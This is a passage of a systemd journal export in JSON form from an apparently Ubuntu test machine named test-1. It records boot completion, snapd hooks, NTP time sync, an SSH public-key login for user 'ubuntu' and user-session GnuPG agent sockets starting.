"1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/core/manager.c", "CODE_LINE" : "3260", "CODE_FUNC" : "manager_notify_finished", "MESSAGE_ID" : "b07a249cd024414a82dd00cd181378ff", "KERNEL_USEC" : "4655018", "USERSPACE_USEC" : "43903173", "MESSAGE" : "Startup finished in 4.655s (kernel) + 43.903s (userspace) = 48.558s.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822841333" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35f;b=e2b08827b5804427b422c10c84f1567e;m=2fcba4f;t=5bd16dfc039b5;x=8ce63cc3a6a6ddf3", "__REALTIME_TIMESTAMP" : "1615280824400309", "__MONOTONIC_TIMESTAMP" : "50117199", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "_PID" : "817", "_COMM" : "snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "daemon.go:576: gracefully waiting for running hooks" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=360;b=e2b08827b5804427b422c10c84f1567e;m=2fcba4f;t=5bd16dfc039b5;x=f865ce5bd4cbe418", "__REALTIME_TIMESTAMP" : "1615280824400309", "__MONOTONIC_TIMESTAMP" : "50117199", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "_PID" : "817", "_COMM" : "snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "daemon.go:578: done waiting for running hooks" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=361;b=e2b08827b5804427b422c10c84f1567e;m=2fcc249;t=5bd16dfc041b0;x=f81c02bb69040e23", "__REALTIME_TIMESTAMP" : "1615280824402352", "__MONOTONIC_TIMESTAMP" : "50119241", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "_PID" : "817", "_COMM" : "snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "daemon stop requested to wait for socket activation" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=362;b=e2b08827b5804427b422c10c84f1567e;m=4435c5d;t=5bd16e106dbc4;x=891668ccabf0551c", "__REALTIME_TIMESTAMP" : "1615280845806532", "__MONOTONIC_TIMESTAMP" : "71523421", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "9", "CODE_FILE" : "../src/timesync/timesyncd-manager.c", "SYSLOG_IDENTIFIER" : "systemd-timesyncd", "_PID" : "501", "_UID" : "62583", "_GID" : "62583", "_COMM" : "systemd-timesyn", "_EXE" : "/lib/systemd/systemd-timesyncd", "_CMDLINE" : "/lib/systemd/systemd-timesyncd", "_CAP_EFFECTIVE" : "2000000", "_SYSTEMD_CGROUP" : "/system.slice/systemd-timesyncd.service", "_SYSTEMD_UNIT" : "systemd-timesyncd.service", "_SYSTEMD_INVOCATION_ID" : "02dc978d5d9147908ffca7c0020b3270", "CODE_LINE" : "678", "CODE_FUNC" : "manager_receive_response", "MESSAGE" : "Synchronized to time server 91.189.89.199:123 (ntp.ubuntu.com).", "_SOURCE_REALTIME_TIMESTAMP" : "1615280845806492" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=363;b=e2b08827b5804427b422c10c84f1567e;m=9efca26;t=5bd16e6b34985;x=409f2dd401169ca7", "__REALTIME_TIMESTAMP" : "1615280940992901", "__MONOTONIC_TIMESTAMP" : "166709798", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "SYSLOG_FACILITY" : "4", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "sshd", "_COMM" : "sshd", "_EXE" : "/usr/sbin/sshd", "_SYSTEMD_CGROUP" : "/system.slice/ssh.service", "_SYSTEMD_UNIT" : "ssh.service", "_SYSTEMD_INVOCATION_ID" : "93b3a6735e0a4aa6b67f86bb4665a76e", "SYSLOG_PID" : "1092", "MESSAGE" : "Accepted publickey for ubuntu from 10.18.255.254 port 50031 ssh2: RSA SHA256:HORx/u4a1tHXBbnoTOF0nmyK3B5/06UnlHbNMExg8+g", "_PID" : "1092", "_CMDLINE" : "sshd: ubuntu [priv]", "_SOURCE_REALTIME_TIMESTAMP" : "1615280940992855" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=364;b=e2b08827b5804427b422c10c84f1567e;m=9efe4c3;t=5bd16e6b3642a;x=7334fd38c0f161a5", "__REALTIME_TIMESTAMP" : "1615280940999722", "__MONOTONIC_TIMESTAMP" : "166716611", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "sshd", "_COMM" : "sshd", "_EXE" : "/usr/sbin/sshd", "_SYSTEMD_CGROUP" : "/system.slice/ssh.service", "_SYSTEMD_UNIT" : "ssh.service", "_SYSTEMD_INVOCATION_ID" : "93b3a6735e0a4aa6b67f86bb4665a76e", "SYSLOG_PID" : "1092", "_PID" : "1092", "_CMDLINE" : "sshd: ubuntu [priv]", "MESSAGE" : "pam_unix(sshd:session): session opened for user ubuntu by (uid=0)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280940999697" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=365;b=e2b08827b5804427b422c10c84f1567e;m=9f004cd;t=5bd16e6b38434;x=6c57a109f623e465", "__REALTIME_TIMESTAMP" : "1615280941007924", "__MONOTONIC_TIMESTAMP" : "166724813", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Created slice User Slice of ubuntu.", "UNIT" : "user-1000.slice", "INVOCATION_ID" : "6d2df251246544468f4d5b4b70d4730b", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941007835" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=366;b=e2b08827b5804427b422c10c84f1567e;m=9f04f2c;t=5bd16e6b3ce93;x=243bdea031327f14", "__REALTIME_TIMESTAMP" : "1615280941026963", "__MONOTONIC_TIMESTAMP" : "166743852", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting User Manager for UID 1000...", "UNIT" : "user@1000.service", "INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941026951" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=367;b=e2b08827b5804427b422c10c84f1567e;m=9f088f5;t=5bd16e6b4085d;x=3242c936452d94ce", "__REALTIME_TIMESTAMP" : "1615280941041757", "__MONOTONIC_TIMESTAMP" : "166758645", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Session 1 of user ubuntu.", "UNIT" : "session-1.scope", "INVOCATION_ID" : "2b1962eb80184110bd624cc00819ebf7", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941040021" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=368;b=e2b08827b5804427b422c10c84f1567e;m=9f0898e;t=5bd16e6b408f6;x=aced2a2b19bceba0", "__REALTIME_TIMESTAMP" : "1615280941041910", "__MONOTONIC_TIMESTAMP" : "166758798", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_EXE" : "/lib/systemd/systemd", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "10", "MESSAGE" : "pam_unix(systemd-user:session): session opened for user ubuntu by (uid=0)", "_PID" : "1103", "_COMM" : "(systemd)", "_CMDLINE" : "(systemd)", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941040532" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=369;b=e2b08827b5804427b422c10c84f1567e;m=9f09ebd;t=5bd16e6b41e24;x=19c833f3edf7cc95", "__REALTIME_TIMESTAMP" : "1615280941047332", "__MONOTONIC_TIMESTAMP" : "166764221", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "SYSLOG_FACILITY" : "4", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-logind", "_PID" : "784", "_COMM" : "systemd-logind", "_EXE" : "/lib/systemd/systemd-logind", "_CMDLINE" : "/lib/systemd/systemd-logind", "_CAP_EFFECTIVE" : "24420002f", "_SYSTEMD_CGROUP" : "/system.slice/systemd-logind.service", "_SYSTEMD_UNIT" : "systemd-logind.service", "_SYSTEMD_INVOCATION_ID" : "92ace4bf8cc84ed790e29aea96b87129", "CODE_FILE" : "../src/login/logind-session.c", "CODE_LINE" : "633", "CODE_FUNC" : "session_start", "MESSAGE_ID" : "8d45620c1a4348dbb17410da57c60c66", "SESSION_ID" : "1", "USER_ID" : "ubuntu", "LEADER" : "1092", "MESSAGE" : "New session 1 of user ubuntu.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941042545" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=36a;b=e2b08827b5804427b422c10c84f1567e;m=9f360e2;t=5bd16e6b6e049;x=c762ed8af5f522cf", "__REALTIME_TIMESTAMP" : "1615280941228105", "__MONOTONIC_TIMESTAMP" : "166944994", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "MESSAGE" : "Reached target Timers.", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "USER_UNIT" : "timers.target", "USER_INVOCATION_ID" : "c32bba9a46b6418a87022db13a18acc5", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941228074", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=36b;b=e2b08827b5804427b422c10c84f1567e;m=9f39479;t=5bd16e6b713e1;x=867aa9f125e4a6b0", "__REALTIME_TIMESTAMP" : "1615280941241313", "__MONOTONIC_TIMESTAMP" : "166958201", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on GnuPG cryptographic agent (ssh-agent emulation).", "USER_UNIT" : "gpg-agent-ssh.socket", "USER_INVOCATION_ID" : "e08cb56c58754a8398efac483a1dba4d", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229248" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=36c;b=e2b08827b5804427b422c10c84f1567e;m=9f39539;t=5bd16e6b714a0;x=400e7f2353aa30d4", "__REALTIME_TIMESTAMP" : "1615280941241504", "__MONOTONIC_TIMESTAMP" : "166958393", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on GnuPG cryptographic agent and passphrase cache (access for web browsers).", "USER_UNIT" : "gpg-agent-browser.socket", "USER_INVOCATION_ID" : "b39e086c7b804706842cb5400720e511", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229328" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=36d;b=e2b08827b5804427b422c10c84f1567e;m=9f395ca;t=5bd16e6b71531;x=52761cb2e41930ca", "__REALTIME_TIMESTAMP" : "1615280941241649", "__MONOTONIC_TIMESTAMP" : "166958538", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on GnuPG cryptographic agent and passphrase cache (restricted).", "USER_UNIT" : "gpg-agent-extra.socket", "USER_INVOCATION_ID" : "ee556158c4bf463385dec9fc66af4c30", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229417" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=36e;b=e2b08827b5804427b422c10c84f1567e;m=9f39631;t=5bd16e6b71599;x=5184e17a5bcb18ae", "__REALTIME_TIMESTAMP" : "1615280941241753", "__MONOTONIC_TIMESTAMP" : "166958641", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Paths.", "USER_UNIT" : "paths.target", "USER_INVOCATION_ID" : "e5185ac070ea4df98a4b00c613372bef", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229430" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=36f;b=e2b08827b5804427b422c10c84f1567e;m=9f39694;t=5bd16e6b715fb;x=8814a2efb8bec83b", "__REALTIME_TIMESTAMP" : "1615280941241851", "__MONOTONIC_TIMESTAMP" : "166958740", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on GnuPG network certificate management daemon.", "USER_UNIT" : "dirmngr.socket", "USER_INVOCATION_ID" : "55274947c49b4c41b3476d8adca963a3", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229505" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=370;b=e2b08827b5804427b422c10c84f1567e;m=9f39702;t=5bd16e6b71669;x=46fe52ce71c1fcf7", "__REALTIME_TIMESTAMP" : "1615280941241961", "__MONOTONIC_TIMESTAMP" : "166958850", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on GnuPG cryptographic agent and passphrase cache.", "USER_UNIT" : "gpg-agent.socket", "USER_INVOCATION_ID" : "1f52d7a7d03443b58a9f67be9e3267f8", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229589" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=371;b=e2b08827b5804427b422c10c84f1567e;m=9f3976b;t=5bd16e6b716d2;x=ca1e497010c4b6c5", "__REALTIME_TIMESTAMP" : "1615280941242066", "__MONOTONIC_TIMESTAMP" : "166958955", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : 